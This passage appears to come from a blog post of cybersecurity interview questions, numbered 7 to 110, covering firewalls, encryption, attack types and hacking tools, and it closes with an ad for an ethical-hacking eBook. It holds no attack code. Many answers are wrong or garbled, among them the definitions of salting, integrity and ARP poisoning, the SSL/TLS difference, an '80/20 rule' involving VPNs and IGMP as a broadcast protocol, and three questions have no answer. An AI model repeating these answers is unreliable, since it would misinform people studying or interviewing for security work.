Confidentiality: Ensure the sensitive data is accessed only by an authorized user.
Integrity: Integrity means the information is in the right format.
Availability: Ensure the data and resources are available for users who need them.
7) What is a Firewall?
It is a security system designed for the network. A firewall is set on the boundaries of any system or network which monitors and controls network traffic. Firewalls are mostly used to protect the system or network from malware, worms, and viruses. Firewalls can also prevent content filtering and remote access.
8) Explain Traceroute
It is a tool that shows the packet path. It lists all the points that the packet passes through. Traceroute is used mostly when the packet does not reach the destination. Traceroute is used to check where the connection breaks or stops or to identify the failure.
9) Differentiate between HIDS and NIDS.
10) Explain SSL
SSL stands for Secure Sockets Layer. It is a technology creating encrypted connections between a web server and a web browser. It is used to protect the information in online transactions and digital payments to maintain data privacy.
11) What do you mean by data leakage?
Data leakage is an unauthorized transfer of data to the outside world. Data leakage occurs via email, optical media, laptops, and USB keys.
12) Explain the brute force attack. How to prevent it?
It is a trial-and-error method to find out the right password or PIN. Hackers repetitively try all the combinations of credentials. In many cases, brute force attacks are automated where the software automatically works to login with credentials. There are ways to prevent Brute Force attacks. They are:
Setting password length.
Increase password complexity.
Set limit on login failures.
13) What is port scanning?
It is the technique for identifying open ports and service available on a specific host. Hackers use port scanning technique to find information for malicious purposes.
14) Name the different layers of the OSI model.
Seven different layers of OSI models are as follows:
Physical Layer
Data Link Layer
Network Layer
Transport Layer
Session Layer
Presentation Layer
Application Layer
15) What is a VPN?
VPN stands for Virtual Private Network. It is a network connection method for creating an encrypted and safe connection. This method protects data from interference, snooping, censorship.
16) What are black hat hackers?
Black hat hackers are people who have a good knowledge of breaching network security. These hackers can generate malware for personal financial gain or other malicious reasons. They break into a secure network to modify, steal, or destroy data so that the network can not be used by authorized network users.
17) What are white hat hackers?
White hat hackers or security specialist are specialized in penetration testing. They protect the information system of an organization.
18) What are grey hat hackers?
Grey hat hackers are computer hacker who sometimes violate ethical standards, but they do not have malicious intent.
19) How to reset a password-protected BIOS configuration?
There are various ways to reset BIOS password. Some of them are as follows:
Remove CMOS battery.
By utilizing the software.
By utilizing a motherboard jumper.
By utilizing MS-DOS.
20) What is MITM attack?
A MITM or Man-in-the-Middle is a type of attack where an attacker intercepts communication between two persons. The main intention of MITM is to access confidential information.
21) Define ARP and its working process.
It is a protocol used for finding MAC address associated with IPv4 address. This protocol work as an interface between the OSI network and OSI link layer.
22) Explain botnet.
It's a number of internet-connected devices like servers, mobile devices, IoT devices, and PCs that are infected and controlled by malware.
23) What is the main difference between SSL and TLS?
The main difference between these two is that SSL verifies the identity of the sender. SSL helps you to track the person you are communicating to. TLS offers a secure channel between two clients.
24) What is the abbreviation of CSRF?
CSRF stands for Cross-Site Request Forgery.
25) What is 2FA? How to implement it for a public website?
TFA stands for Two Factor Authentication. It is a security process to identify the person who is accessing an online account. The user is granted access only after presenting evidence to the authentication device.
26) Explain the difference between asymmetric and symmetric encryption.
Symmetric encryption requires the same key for encryption and decryption. On the other hand, asymmetric encryption needs different keys for encryption and decryption.
27) What is the full form of XSS?
XSS stands for cross-site scripting.
28) Explain WAF
WAF stands for Web Application Firewall. WAF is used to protect the application by filtering and monitoring incoming and outgoing traffic between web application and the internet.
29) What is hacking?
Hacking is a process of finding weakness in computer or private networks to exploit its weaknesses and gain access.
For example, using password cracking technique to gain access to a system.
30) Who are hackers?
A Hacker is a person who finds and exploits the weakness in computer systems, smartphones, tablets, or networks to gain access. Hackers are well experienced computer programmers with knowledge of computer security.
31) What is network sniffing?
Network sniffing is a tool used for analyzing data packets sent over a network. This can be done by the specialized software program or hardware equipment. Sniffing can be used to:
Capture sensitive data such as password.
Eavesdrop on chat messages
Monitor data package over a network
32) What is the importance of DNS monitoring?
Yong domains are easily infected with malicious software. You need to use DNS monitoring tools to identify malware.
33) Define the process of salting. What is the use of salting?
Salting is that process to extend the length of passwords by using special characters. To use salting, it is very important to know the entire mechanism of salting. The use of salting is to safeguard passwords. It also prevents attackers testing known words across the system.
For example, Hash("QxLUF1bgIAdeQX") is added to each and every password to protect your password. It is called as salt.
34) What is SSH?
SSH stands for Secure Socket Shell or Secure Shell. It is a utility suite that provides system administrators secure way to access the data on a network.
35) Is SSL protocol enough for network security?
SSL verifies the sender's identity, but it does not provide security once the data is transferred to the server. It is good to use server-side encryption and hashing to protect the server against a data breach.
36) What is black box testing and white box testing?
Black box testing: It is a software testing method in which the internal structure or program code is hidden.
White box testing: A software testing method in which internal structure or program is known by tester.
37) Explain vulnerabilities in network security.
Vulnerabilities refer to the weak point in software code which can be exploited by a threat actor. They are most commonly found in an application like SaaS (Software as a service) software.
38) Explain TCP Three-way handshake.
It is a process used in a network to make a connection between a local host and server. This method requires the client and server to negotiate synchronization and acknowledgment packets before starting communication.
39) Define the term residual risk. What are three ways to deal with risk?
It is a threat that balances risk exposure after finding and eliminating threats.
Three ways to deal with risk are:
Reduce it
Avoid it
Accept it.
40) Define Exfiltration.
Data exfiltration refers to the unauthorized transfer of data from a computer system. This transmission may be manual and carried out by anyone having physical access to a computer.
41) What is exploit in network security?
An exploit is a method utilized by hackers to access data in an unauthorized way. It is incorporated into malware.
42) What do you mean by penetration testing?
It is the process of checking exploitable vulnerabilities on the target. In web security, it is used to augment the web application firewall.
43) List out some of the common cyber-attack.
Following are the common cyber-attacks which can be used by hackers to damage network:
Malware
Phishing
Password attacks
DDoS
Man in the middle
Drive-by downloads
Malvertising
Rogue software
44) How to make the user authentication process more secure?
In order to authenticate users, they have to provide their identity. The ID and Key can be used to confirm the user's identity. This is an ideal way how the system should authorize the user.
45) Explain the concept of cross-site scripting.
Cross-site scripting refers to a network security vulnerability in which malicious scripts are injected into websites. This attack occurs when attackers allow an untrusted source to inject code into a web application.
46) Name the protocol that broadcast the information across all the devices.
Internet Group Management Protocol or IGMP is a communication protocol that is used in game or video streaming. It facilitates routers and other communication devices to send packets.
47) How to protect email messages?
Use cipher algorithm to protect email, credit card information, and corporate data.
48) What are the risks associated with public Wi-Fi?
Public Wi-Fi has many security issues. Wi-Fi attacks include karma attack, sniffing, war-driving, brute force attack, etc.
Public Wi-Fi may identify data that is passed through a network device like emails, browsing history, passwords, and credit card data.
49) What is Data Encryption? Why it is important in network security?
Data encryption is a technique in which the sender converts the message into a code. It allows only authorized user to gain access.
50) Explain the main difference between Diffie-Hellman and RSA.
Diffie-Hellman is a protocol used while exchanging key between two parties while RSA is an algorithm that works on the basis two keys called private and public key.
51) What is a remote desktop protocol?
Remote Desktop Protocol (RDP) is developed by Microsoft, which provides GUI to connect two devices over a network.
The user uses RDP client software to serve this purpose while other device must run RDP server software. This protocol is specifically designed for remote management and to access virtual PCs, applications, and terminal server.
52) Define Forward Secrecy.
Forward Secrecy is a security measure that ensures the integrity of unique session key in event that long term key is compromised.
53) Explain the concept of IV in encryption.
IV stands for the initial vector is an arbitrary number that is used to ensures that identical text encrypted to different ciphertexts. Encryption program uses this number only once per session.
54) Explain the difference between stream cipher and block cipher.
55) Give some examples of a symmetric encryption algorithm.
Following are some examples of symmetric encryption algorithm.
RCx
Blowfish
Rijndael (AES)
DES
56) What is the abbreviation of ECB and CBC?
The full form of ECB is Electronic Codebook, and the full form of CBC is Cipher Block Chaining.
57) Explain a buffer overflow attack.
Buffer overflow attack is an attack that takes advantage of a process that attempts to write more data to a fixed-length memory block.
58) Define Spyware.
Spyware is a malware that aims to steal data about the organization or person. This malware can damage the organization's computer system.
59) What is impersonation?
It is a mechanism of assigning the user account to an unknown user.
60) What do you mean by SRM?
SRM stands for Security Reference Monitor provides routines for computer drivers to grant access rights to object.
61) What is a computer virus?
A virus is a malicious software that is executed without the user's consent. Viruses can consume computer resources, such as CPU time and memory. Sometimes, the virus makes changes in other computer programs and insert its own code to harm the computer system.
A computer virus may be used to:
Access private data like user id and passwords
Display annoying messages to the user
Corrupt data in your computer
Log the user's keystrokes
62) What do you mean by Authenticode?
Authenticode is a technology that identifies the publisher of Authenticode sign software. It allows users to ensure that the software is genuine and not contain any malicious program.
63) Define CryptoAPI
CryptoAPI is a collection of encryption APIs which allows developers to create a project on a secure network.
64) Explain steps to secure web server.
Follow the following steps to secure your web server:
Update ownership of file.
Keep your webserver updated.
Disable extra modules in the webserver.
Delete default scripts.
65) What is Microsoft Baseline Security Analyzer?
Microsoft Baseline Security Analyzer or MBSA is a graphical and command-line interface that provides a method to find missing security updates and misconfigurations.
66) What is Ethical hacking?
Ethical hacking is a method to improve the security of a network. In this method, hackers fix vulnerabilities and weakness of computer or network. Ethical hackers use software tools to secure the system.
67) Explain social engineering and its attacks.
Social engineering is the term used to convince people to reveal confidential information.
There are mainly three types of social engineering attacks: 1) Human-based, 2) Mobile-based, and 3) Computer-based.
Human-based attack: They may pretend like a genuine user who requests higher authority to reveal private and confidential information of the organization.
Computer-based attack: In this attack, attackers send fake emails to harm the computer. They ask people to forward such email.
Mobile-based attack: Attacker may send SMS to others and collect important information. If any user downloads a malicious app, then it can be misused to access authentication information.
68) What is IP and MAC Addresses?
IP Address is the acronym for Internet Protocol address. An internet protocol address is used to uniquely identify a computer or device such as printers, storage disks on a computer network.
MAC Address is the acronym for Media Access Control address. MAC addresses are used to uniquely identify network interfaces for communication at the physical layer of the network.
69) What do you mean by a worm?
A Worm is a type of malware which replicates from one computer to another.
70) State the difference between virus and worm
71) Name some tools used for packet sniffing.
Following are some tools used for packet sniffing.
Tcpdump
Kismet
Wireshark
NetworkMiner
Dsniff
72) Explain anti-virus sensor systems
Antivirus is software tool that is used to identify, prevent, or remove the viruses present in the computer. They perform system checks and increase the security of the computer regularly.
73) List out the types of sniffing attacks.
Various types of sniffing attacks are:
Protocol Sniffing
Web password sniffing
Application-level sniffing
TCP Session stealing
LAN Sniffing
ARP Sniffing
74) What is a distributed denial-of-service attack (DDoS)?
It is an attack in which multiple computers attack website, server, or any network resource.
75) Explain the concept of session hijacking.
TCP session hijacking is the misuse of a valid computer session. IP spoofing is the most common method of session hijacking. In this method, attackers use IP packets to insert a command between two nodes of the network.
76) List out various methods of session hijacking.
Various methods of session hijacking are:
Using packet Sniffers
Cross-Site Scripting (XSS Attack)
IP Spoofing
Blind Attack
77) What are Hacking Tools?
Hacking Tools are computer programs and scripts that help you find and exploit weaknesses in computer systems, web applications, servers, and networks. There are varieties of such tools available on the market. Some of them are open source, while others are a commercial solution.
78) Explain honeypot and its Types.
Honeypot is a decoy computer system which records all the transactions, interactions, and actions with users.
Honeypot is classified into two categories: 1) Production honeypot and 2) Research honeypot.
Production honeypot: It is designed to capture real information for the administrator to access vulnerabilities. They are generally placed inside production networks to increase their security.
Research Honeypot: It is used by educational institutions and organizations for the sole purpose of researching the motives and tactics of the back-hat community for targeting different networks.
79) Name common encryption tools.
Tools available for encryptions are as follows:
RSA
Twofish
AES
Triple DES
80) What is Backdoor?
It is a malware type in which security mechanism is bypassed to access a system.
81) Is it right to send login credentials through email?
It is not right to send login credentials through email because if you send someone userid and password in the mail, chances of email attacks are high.
82) Explain the 80/20 rule of networking?
This rule is based on the percentage of network traffic, in which 80% of all network traffic should remain local while the rest of the traffic should be routed towards a permanent VPN.
83) Define WEP cracking.
It is a method used for a security breach in wireless networks. There are two types of WEP cracking: 1) Active cracking and 2) Passive cracking.
84) What are various WEP cracking tools?
Well known WEP cracking tools are:
Aircrack
WebDecrypt
Kismet
WEPCrack
85) What is a security auditing?
Security auditing is an internal inspection of applications and operating systems for security flaws. An audit can also be done via line by line inspection of code.
86) Explain phishing.
It is a technique used to obtain a username, password, and credit card details from other users.
87) What is Nano-scale encryption?
Nano encryption is a research area which provides robust security to computers and prevents them from hacking.
88) Define Security Testing?
Security Testing is defined as a type of Software Testing that ensures software systems and applications are free from any vulnerabilities, threats, risks that may cause a big loss.
89) Explain Security Scanning.
Security scanning involves identifying network and system weaknesses and later provides solutions for reducing these risks. This scanning can be performed for both Manual as well as Automated scanning.
90) Name the available hacking tools.
Following is a list of useful hacking tools.
Acunetix
WebInspect
Probably
Netsparker
Angry IP scanner:
Burp Suite
Savvius
91) What is the importance of penetration testing in an enterprise?
Here are two common application of Penetration testing.
Financial sectors like stock trading exchanges, investment banking, want their data to be secured, and penetration testing is essential to ensure security.
In case if the software system is already hacked and the organization would like to determine whether any threats are still present in the system to avoid future hacks.
92) What are the disadvantages of penetration testing?
Disadvantages of penetration testing are:
Penetration testing cannot find all vulnerabilities in the system.
There are limitations of time, budget, scope, skills of penetration testers.
Data loss and corruption
Down Time is high which increase costs
93) Explain security threat
Security threat is defined as a risk which can steal confidential data and harm computer systems as well as organization.
94) What are physical threats?
A physical threat is a potential cause of an incident that may result in loss or physical damage to the computer systems.
95) Give examples of non-physical threats
Following are some examples of non-physical threat:
Loss of sensitive information
Loss or corruption of system data
Cyber security Breaches
Disrupt business operations that rely on computer systems
Illegal monitoring of activities on computer systems
96) What is Trojan virus?
Trojan is a malware employed by hackers and cyber-thieves to gain access to any computer. Here attackers use social engineering techniques to execute the trojan on the system.
97) Define SQL Injection
It is an attack that poisons malicious SQL statements to database. It helps you to take benefit of the design flaws in poorly designed web applications to exploit SQL statements to execute malicious SQL code. In many situations, an attacker can escalate SQL injection attack in order to perform other attack, i.e. denial-of-service attack.
98) List security vulnerabilities as per Open Web Application Security Project (OWASP).
Security vulnerabilities as per open web application security project are as follows:
SQL Injection
Cross-site request forgery
Insecure cryptographic storage
Broken authentication and session management
Insufficient transport layer protection
Unvalidated redirects and forwards
Failure to restrict URL access
99) Define an access token.
An access token is a credential which is used by the system to check whether the API should be granted to a particular object or not.
100) Explain ARP Poisoning
ARP (Address Resolution Protocol) Poisoning is a type of cyber-attack which is used to convert IP address to physical addresses on a network device. The host sends an ARP broadcast on the network, and the recipient computer responds back with its physical address.
ARP poisoning is sending fake addresses to the switch so that it can associate the fake addresses with the IP address of a genuine computer on a network and hijack the traffic.
101) Name common types of non-physical threats.
Following are various types of non-physical threats:
Trojans
Adware
Worms
Spyware
Denial of Service Attacks
Distributed Denial of Service Attacks
Virus
Key loggers
Unauthorized access to computer systems resources
Phishing
102) Explain the sequence of a TCP connection.
The sequence of a TCP connection is SYN-SYN ACK-ACK.
103) Define hybrid attacks.
Hybrid attack is a blend of dictionary method and brute force attack. This attack is used to crack passwords by making a change of a dictionary word with symbols and numbers.
104) What is Nmap?
Nmap is a tool which is used for finding networks and in security auditing.
105) What is the use of EtterPeak tool?
EtterPeak is a network analysis tool that is used for sniffing packets of network traffic.
106) What are the types of cyber-attacks?
There are two types of cyberattacks: 1) Web-based attacks, 2) System based attacks.
107) List out web-based attacks
Some web-based attacks are: 1) SQL Injection attacks, 2) Phishing, 3) Brute Force, 4) DNS Spoofing, 4) Denial of Service, and 5) Dictionary attacks.
108) Give examples of System-based attacks
Examples of system-based attacks are:
Virus
Backdoors
Bots
Worm
109) List out the types of cyber attackers
There are four types of cyber attackers. They are: 1) cybercriminals, 2) hacktivists, 3) insider threats, 4) state-sponsored attackers.
110) Define accidental threats
They are threats that are accidently done by organization employees. In these threats, an employee unintentionally deletes any file or share confidential data with outsiders or a business partner going beyond the policy of the company.
Ethical Hacking Tutorial for Beginners PDF
An Ethical Hacker exposes vulnerabilities in software to help business owners fix those security holes before a malicious hacker discovers them. In this eBook, you learn all about Ethical hacking with loads of live hacking examples to make the subject matter clear.
Key Highlights of Ethical Hacking Tutorial PDF are
204+ pages
eBook Designed for beginners
Beautifully annotated screenshots
You will get lifetime access
Inside this PDF
What is Hacking? Introduction & Types
Potential Security Threats To Your Computer Systems
Skills Required to Become a Ethical Hacker
What is Social Engineering? Attacks, Techniques & Prevention
Cryptography Tutorial: Cryptanalysis, RC4, CrypTool
How to Crack a Password
Worm, Virus & Trojan Horse: Ethical Hacking Tutorial
Learn ARP Poisoning with Examples
Wireshark Tutorial: Network & Passwords Sniffer
How to Hack WiFi (Wireless) Network
DoS (Denial of Service) Attack Tutorial: Ping of Death, DDOS
How to Hack a Web Server
How to Hack a Website: Online Example
SQL Injection Tutorial: Learn with Example
Hacking Linux OS: Complete Tutorial with Ubuntu Example
CISSP Certification Guide: What is, Prerequisites, Cost, CISSP Salary
10 Most Common Web Security Vulnerabilities
Kali Linux Tutorial: What is, Install, Utilize Metasploit and Nmap
No comments:
Post a Comment